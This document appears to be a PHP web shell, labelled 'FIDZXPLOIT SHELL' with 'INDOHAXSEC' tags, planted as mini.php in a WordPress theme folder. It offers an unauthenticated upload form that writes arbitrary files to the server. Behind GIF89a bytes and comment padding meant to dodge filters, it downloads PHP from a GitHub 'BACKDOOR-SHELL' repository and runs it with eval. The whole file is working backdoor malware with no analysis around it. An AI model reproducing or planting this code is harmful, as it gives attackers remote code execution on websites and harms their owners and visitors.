File: /home/iymdjwzl/public_html/wp-content/themes/mini.php
<!DOCTYPE html>
<html>
<head>
<title>FIDZXPLOIT SHELL</title>
</head>
<body>
<form enctype="multipart/form-data" action="" method="POST">
<p>Upload your file</p>
<input type="file" name="uploaded_file"></input><br />
<input type="submit" value="Upload"></input>
</form>
</body>
</html>
<?PHP
if(!empty($_FILES['uploaded_file']))
{
$path = "";
$path = $path . basename( $_FILES['uploaded_file']['name']);
if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
echo "The file ". basename( $_FILES['uploaded_file']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
?>INDOHAXSEC<html><link rel='icon' href='https://l.top4top.io/p_2612z9xq60.png' sizes='20x20' type='image/png'>-TEAM;GIF89;aGIF89;aGIF89;a<?=/****/@null; /********/ /*******/ /********/@trim("?>");/**/?><?pHp
function getCurl0($url)
{
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
}
?>
<?=eval("?>".getCurl0("https://raw.githubusercontent.com/INDOHAXSEC/BACKDOOR-SHELL/refs/heads/main/mini.php")); __halt_compiler();?>